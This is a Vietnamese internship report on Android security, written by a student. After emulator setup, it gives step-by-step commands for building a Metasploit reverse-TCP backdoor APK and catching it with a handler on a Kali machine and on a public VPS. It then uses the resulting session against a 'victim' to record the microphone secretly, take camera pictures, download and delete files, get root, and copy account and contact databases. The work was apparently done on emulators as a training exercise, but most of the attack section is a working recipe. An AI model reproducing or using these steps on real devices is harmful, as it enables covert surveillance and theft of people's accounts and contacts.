SVTT : TRẦN THANH THÔNGMSSV : 1120168 37
BÁO CÁO ĐỀ TÀI THỰC TẬP
Bước 4: Giao diện phần mềm sau khi cài đặt xong.
2.2.4 Tải về và cài đặt ứng dụng Genymotion:
Bước 1: Trước khi bắt đầu, ta cần có 1 tài khoản trên web www.genymotion.com
Ta có thể đăng ký miễn phí và tải Genymotion về máy.
Bước 2: Bắt đầu cài đặt phần mềm Genymotion. Ta lựa chọn ngôn ngữ cài đặt > OK > Next
SVTT : TRẦN THANH THÔNGMSSV : 1120168 38
BÁO CÁO ĐỀ TÀI THỰC TẬP
Bước 3: Chọn thư mục lưu cài đặt.
Bước 4: Next > Next > Install > Finish
SVTT : TRẦN THANH THÔNGMSSV : 1120168 39
BÁO CÁO ĐỀ TÀI THỰC TẬP
Bước 5: Mở Genymotion vừa cài đặt xong. Ta vào thiết đặt 1 số thông số ở mục Settings
Bước 6: Nhập Username và Password mà bạn đã đăng ký trên web www.genymotion.com ở thẻ General
SVTT : TRẦN THANH THÔNGMSSV : 1120168 40
BÁO CÁO ĐỀ TÀI THỰC TẬP
Bước 7: Ở thẻ ADB > chọn Use custom Android SDK tools > Browser đường dẫn đến thư mục sdk trong thư mục mà ta đã tải Android SDK Manager. Sau đó lưu lại cài đặt.
F:\Soft\adt-bundle-windows-x86_64-20140702\sdk
2.2.5 Tạo máy ảo chạy Android trên Genymotion kết hợp VirtualBox:
Bước 1: Ta mở Genymotion lên để tạo máy ảo. Vào Add
SVTT : TRẦN THANH THÔNGMSSV : 1120168 41
BÁO CÁO ĐỀ TÀI THỰC TẬP
Bước 2: Chọn tên thiết bị mà muốn làm máy ảo.
Xuất hiện cấu hình máy ảo sắp tạo:
SVTT : TRẦN THANH THÔNGMSSV : 1120168 42
BÁO CÁO ĐỀ TÀI THỰC TẬP
Bước 3: Next > Đợi máy ảo tự động tải về từ web và Finish quá trình tạo máy ảo.
Bước 4: Để khởi động máy ảo vừa tạo ta chọn máy ảo > Play
SVTT : TRẦN THANH THÔNGMSSV : 1120168 43
BÁO CÁO ĐỀ TÀI THỰC TẬP
Bước 5: Giao diện máy ảo Google Nexus 7 vừa tạo thành công.
2.3 TẠO MÃ ĐỘC TRÊN KALI LINUX XÂM NHẬP ANDROID
2.3.1 Tạo mã độc trên Kali Linux
Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy
android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo
Kali Linux bằng Vmware, ta nên thiết lập phần Network như sau:
Bấm vào VM Settings... ở thanh lựa chọn của Vmware
SVTT : TRẦN THANH THÔNGMSSV : 1120168 44
BÁO CÁO ĐỀ TÀI THỰC TẬP
Bấm vào Network Adapter và chọn Bridged: connection directly to the
physical network
Bấm vào Edit => Virtual Network Editor...
SVTT : TRẦN THANH THÔNGMSSV : 1120168 45
BÁO CÁO ĐỀ TÀI THỰC TẬP
Trên phần Bridge (connect VMs directly to the external network) chọn adapter
của máy thật
SVTT : TRẦN THANH THÔNGMSSV : 1120168 46
BÁO CÁO ĐỀ TÀI THỰC TẬP
Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android
Đầu tiên mở Terminal và gõ dòng lệnh
Msfpayload android/meterpreter/reverse_tcp lhost=192.168.126.130
lport=8080 R > /root/Desktop/hack.apk
SVTT : TRẦN THANH THÔNGMSSV : 1120168 47
BÁO CÁO ĐỀ TÀI THỰC TẬP
192.168.126.130 là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem
IP của máy Kali
8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng
Lệnh trên sẽ tạo ra 1 file hack.apk trên desktop của Kali, đây chính là một
Metasploit reverse tcp backdoor.
SVTT : TRẦN THANH THÔNGMSSV : 1120168 48
BÁO CÁO ĐỀ TÀI THỰC TẬP
Tiếp theo, gõ lệnh msfconsole
Sau khi msfconsole load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng
cách gõ lệnh sau:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
SVTT : TRẦN THANH THÔNGMSSV : 1120168 49
BÁO CÁO ĐỀ TÀI THỰC TẬP
set lhost 192.168.126.130 – nhập địa chỉ IP giống với khi tạo payload ở trên.
set lport 8080 – nhập port giống với port khi tạo payload ở trên.
Exploit
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
Thử với một máy Samsung Galaxy S3 giả lập, tải về hack.apk, cài đặt và mở lên
được giao diện như dưới, nhấp vào nút reverse_tcp
SVTT : TRẦN THANH THÔNGMSSV : 1120168 50
BÁO CÁO ĐỀ TÀI THỰC TẬP
Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:
SVTT : TRẦN THANH THÔNGMSSV : 1120168 51
BÁO CÁO ĐỀ TÀI THỰC TẬP
Để xem thông tin về máy, nhập lệnh SysInfo
2.3.2 Thực hiện khai thác dữ liệu trong SDcard
a. Sử dụng camera
Để xem danh sách camera, nhập webcam_list
SVTT : TRẦN THANH THÔNGMSSV : 1120168 52
BÁO CÁO ĐỀ TÀI THỰC TẬP
Để chụp hình bằng camera, nhập webcam_snap x với x là ID của camera xem ở
danh sách camera ở phần trước. Ví dụ như sau:
File hình đã chụp từ camera của máy android là GBgAyecQ.jpg được lưu ở /root
của máy
b. Ghi âm
SVTT : TRẦN THANH THÔNGMSSV : 1120168 53
BÁO CÁO ĐỀ TÀI THỰC TẬP
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
c. Lấy file từ SDcard
Để vào SDcard, nhập lệnh cd /sdcard và lệnh ls để xem danh sách file, thư mục
Ví dụ ở đây, ta tải file hack-1.apk trong thư mục download của SDcard
SVTT : TRẦN THANH THÔNGMSSV : 1120168 54
BÁO CÁO ĐỀ TÀI THỰC TẬP
Dùng lệnh cd /sdcard/Download để vào thư mục
SVTT : TRẦN THANH THÔNGMSSV : 1120168 55
BÁO CÁO ĐỀ TÀI THỰC TẬP
Như trên hình, ta thấy 2 file là hack-1.apk và hack.apk, để tải hack-1.apk về
máy, ta nhập lệnh
Download hack-1.apk
Và file này sẽ được tải về thư mục root của máy Kali
SVTT : TRẦN THANH THÔNGMSSV : 1120168 56
BÁO CÁO ĐỀ TÀI THỰC TẬP
3. THỰC HIỆN TRÊN MÔI TRƯỜNG VPS
1. GIỚI THIỆU VỀ VPS1.1. Định nghĩa
Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ
vật lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể
có hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này chỉ
bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều.
Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn
quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế
100% khả năng bị hack local.
Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài
nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến
các Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn công thì
mọi tài khoản khác trên VPS đều hoạt động bình thường.
VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn
nặng, nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi
người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình server...
1.2. Đặc điểm về thông số VPS
Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung
lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng.
Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.
SVTT : TRẦN THANH THÔNGMSSV : 1120168 57
BÁO CÁO ĐỀ TÀI THỰC TẬP
Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng
khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình
duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao…
Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên
mà không cần phải khởi động lại hệ thống.
Có thể cài lại hệ điều hành với thời gian từ 5-10 phút.
1.3. Giá trị khi sử dụng VPS
Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS
phù hợp.
Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng.
Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng.
Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection.
Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.
2. CÀI ĐẶT METASPLOIT LÊN VPS2.1. Giới thiệu Metasploit
Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra,
tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng
đối tượng Perl, với những components được viết bằng C, assembler, và Python.
Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS.
2.2. Cài đặt
Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community. Ta
chọn phiên bản Community miễn phí và dùng cho nghiên cứu.
SVTT : TRẦN THANH THÔNGMSSV : 1120168 58
BÁO CÁO ĐỀ TÀI THỰC TẬP
Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần
mềm khác.
SVTT : TRẦN THANH THÔNGMSSV : 1120168 59
BÁO CÁO ĐỀ TÀI THỰC TẬP
Chọn folder cài đặt:
Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790
SVTT : TRẦN THANH THÔNGMSSV : 1120168 60
BÁO CÁO ĐỀ TÀI THỰC TẬP
Chọn server và ngày hết hạn, để mặc định:
SVTT : TRẦN THANH THÔNGMSSV : 1120168 61
BÁO CÁO ĐỀ TÀI THỰC TẬP
Quá trình cài đặt của Metasploit:
Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:
SVTT : TRẦN THANH THÔNGMSSV : 1120168 62
BÁO CÁO ĐỀ TÀI THỰC TẬP
Sau khi Finish trình duyệt web mở lên và đi tới giao diện
SVTT : TRẦN THANH THÔNGMSSV : 1120168 63
BÁO CÁO ĐỀ TÀI THỰC TẬP
Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào
Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn
Create Account:
Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License:
SVTT : TRẦN THANH THÔNGMSSV : 1120168 64
BÁO CÁO ĐỀ TÀI THỰC TẬP
3. TẤN CÔNG MÁY ANDROID TỪ MÁY VPS
3.1 Tạo ứng dụng chứa mã độc trên Kali Linux:
Trước tiên, ta cần một ứng dụng backdoor để nạn nhân cài vào điện thoại AndroidBước 1: Khởi động máy ảo Kali Linux. Mở Terminal.Bước 2: Thực hiện lệnh sau để tạo mã độc từ payload Meterpreter:“msfpayload android/meterpreter/reverse_tcp lhost =<IP máy VPS> lport=<Mã port muốn dùng> R > <đường dẫn lưu trữ> / <tên file>”Giả sử: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162 lport=4444 R> /root/Desktop/hack.apk
3.2 Tấn công điện thoại Android:Bước 1: Tại máy VPS, mở Metasploit Console. Đợi phần mềm khởi động, có thể mất vài chục phút.Bước 2: Tiến hành thiết đặt payload bằng các lệnh
“ use exploit/multi/handler ” “ set payload android/meterpreter/reverse_tcp ” “ set lhost 14.0.21.162 ” “ set lport 4444 ” “ run ”Ta phải sử dụng đúng payload, lhost, lport mà ta đã dùng để tạo backdoor ở
trên.
Bước 3: Sau đó, Metasploit sẽ khởi động 1 handler để chờ đợi sự kết nối từ máy Android nạn nhân. Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta sẽ nhận được thông báo như sau:
SVTT : TRẦN THANH THÔNGMSSV : 1120168 65
BÁO CÁO ĐỀ TÀI THỰC TẬP
Bước 4: Dùng lệnh “help” để kiểm tra các lệnh ta có thể thao tác
3.3 Các phương thức tấn công được sử dụng:
Sau đây sẽ giới thiệu 1 số phương thức để tân công máy Android nạn nhân.
3.3.1 Ghi âm lén:
Sử dụng lệnh: “ record_mic <số giây ghi âm> ”
3.3.2 Sử dụng camera:
Xem danh sách webcam của thiết bị: “ webcam_list ”Chụp ảnh lén: “webcam_snap <mã camera>”
SVTT : TRẦN THANH THÔNGMSSV : 1120168 66
BÁO CÁO ĐỀ TÀI THỰC TẬP
3.3.3 Tải và xóa file bất kỳ từ bộ nhớ sdcard:
Di chuyển vào thư mục bằng lệnh: cdTải về bằng lệnh: download <tên file>Xóa tập tin bằng lệnh: rm <tên file>
3.3.4 Truy cập trực tiếp vào hệ thống:
Truy cập vào hệ thống bằng lệnh: “shell” > “su”
Kiểm tra máy đã root hay chưa bằng lệnh: “whoami”
Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có thể tiếp tục tấn công.
SVTT : TRẦN THANH THÔNGMSSV : 1120168 67
BÁO CÁO ĐỀ TÀI THỰC TẬP
3.3.5 Truy cập và khai thác tài khoản người dùng:
Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls –l”
Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard”
Trở về meterpreter và tải file accounts.db về:
SVTT : TRẦN THANH THÔNGMSSV : 1120168 68
BÁO CÁO ĐỀ TÀI THỰC TẬP
Sử dụng tiện ích SQLite Manager trên Firefox để xem nội dung của accounts.db
3.3.6 Truy cập và đánh cắp danh bạ điện thoại:
Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại:
“cd /data/data/com.android.providers.contacts/databases”
SVTT : TRẦN THANH THÔNGMSSV : 1120168 69
BÁO CÁO ĐỀ TÀI THỰC TẬP
Copy về thẻ sdcard và tải về máy
Xem nội dung của contacts2.db bằng SQLite Manager
SVTT : TRẦN THANH THÔNGMSSV : 1120168 70
BÁO CÁO ĐỀ TÀI THỰC TẬP
3.3.7 Một số câu lệnh khác:
- Để biết thêm về các lệnh có thể thực hiện ta dùng help
- Để xem thông tin về máy, nhập lệnh sysinfo
SVTT : TRẦN THANH THÔNGMSSV : 1120168 71
BÁO CÁO ĐỀ TÀI THỰC TẬP
- Để xem các tác vụ đang chạy gõ ps
- Xem ip của máy bị hack ta gõ ipconfig
- Xem danh sách thư mục, file gõ ls
- Để upload gõ lệnh upload
- ls -l danh mục file và các quyền
- Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền
/DATA
/DATA/APP
/DATA/SYSTEM
/DATA/SYSTEM/accounts.db
/DATA/SYSTEM/SYNC/accounts.xml
/SYSTEM/APP/
- Để xem danh sách và down load các file hay thay đổi các file trong ROM
Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập
Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename
Ví dụ chmod -R 777 /data
Ctrl + C để quay lại
SVTT : TRẦN THANH THÔNGMSSV : 1120168 72
BÁO CÁO ĐỀ TÀI THỰC TẬP
KẾT LUẬN
Qua thời gian thực tập tại Trung tâm ATHENA, em đã học hỏi được rất nhiều kiến
thức cũng như kinh nghiệm sống. Phong cách và môi trường làm việc chuyên nghiệp,
tinh thần trách nhiệm cao, sự quyết tâm và sáng tạo trong công việc, sự cần cù, siêng
năng, chăm chỉ.
Do thời gian thực tập chưa lâu, kiến thức bản thân còn hạn chế nên dù đã cố gắng
nhưng báo cáo thực tập của em sẽ không tránh khỏi những sai sót, khuyết điểm. Em rất
mong được sự góp ý chỉ bảo của các thầy cô để báo cáo thực tập của em được hoàn chỉnh
hơn.
Một lần nữa, em xin cảm ơn đến các thầy cô trong trường Đại học Khoa Học Tự
Nhiên – TP Hồ Chí Minh, các thầy cô, các anh chị công tác trong khoa Điện Tử Viễn
Thông và em xin chân thành cảm ơn thầy Võ Đỗ Thắng cùng các thầy cô và các anh chị
trong trung tâm ATHENA đã tận tình giúp đỡ em hoàn thành báo cáo này.
TP. Hồ Chí Minh, ngày 11 tháng 11 năm 2014
Sinh viên thực hiện
Trần Thanh Thông
SVTT : TRẦN THANH THÔNGMSSV : 1120168 73
BÁO CÁO ĐỀ TÀI THỰC TẬP
VIDEO QUÁ TRÌNH THỰC HIỆN VÀ LINK FILE
Clip giới thiệu bản thân
https://www.youtube.com/watch?v=vk3wAGUZlaQ&list=UUPgGms5Pd-
h3QNRDqV0Wj9Q
Clip thuận lợi và khó khăn trong quá trình thực tập
https://www.youtube.com/watch?v=pmopA5A3mBU&list=UUPgGms5Pd-h3QNRDqV0Wj9Q&index=3
Cài đặt Kali Linux trên VMware
https://www.youtube.com/watch?v=W58xKArQ5zE&index=2&list=UUPgGms5Pd-h3QNRDqV0Wj9Q
Cài đặt Metasploit trên Windows
https://www.youtube.com/watch?v=IHw9a5roduU&list=UUPgGms5Pd-h3QNRDqV0Wj9Q
Tấn công Android trên VPS
https://www.youtube.com/watch?v=6tBxuJMhzzY&feature=youtu.be
Báo cáo tuần 1 http://www.slideshare.net/thanhthong1210/athena-tun-1
Báo cáo tuần 2 http://www.slideshare.net/thanhthong1210/athena-tun-2
Báo cáo tuần 3 http://www.slideshare.net/thanhthong1210/athena-tun-3
Báo cáo tuần 4 http://www.slideshare.net/thanhthong1210/athena-tun-4
Báo cáo tuần 5 http://www.slideshare.net/thanhthong1210/athena-tun-5
Link facebook cá nhân https://www.facebook.com/thanh.thong.14
SVTT : TRẦN THANH THÔNGMSSV : 1120168 74
BÁO CÁO ĐỀ TÀI THỰC TẬP
TRÍCH DẪN NGUỒN THAM KHẢO
http://www.quantrimang.com.vn/lo-hong-bao-mat-nghiem-trong-de-doa-82-may-
android-110510
http://sinhvienit.net/forum
http://forum.bkav.com.vn
http://developer.android.com/sdk/index.html#download
http://www.oracle.com/technetwork/java/javase/downloads
http://choimobile.vn/forums/#thao-luan-hdh-android.62
http://www.oracle.com/technetwork/server-storage/virtualbox/downloads/index.html
http://www.genymotion.com/
http://www.whitehat.vn/threads/
https://code.google.com/p/dex2jar/
https://code.google.com/p/innlab/downloads/detail?name=jd-gui-0.3.3.windows.zip&
http://mobilelife.vn/resources/super-apk-tool-v2-0-cong-cu-chinh-sua-apk-bang-giao-dien-cuc-manh.12/
Giáo trình khóa học System Hacking – Trung tâm đào tạo ATHENA –
www.Athena.Edu.Vn
Giáo trình Lập trình trên thiết bị di động Android – Trung tâm Tin Học Trường
ĐH Khoa học Tự Nhiên – ĐHQG TPHCM – www.t3h.vn
SVTT : TRẦN THANH THÔNGMSSV : 1120168 75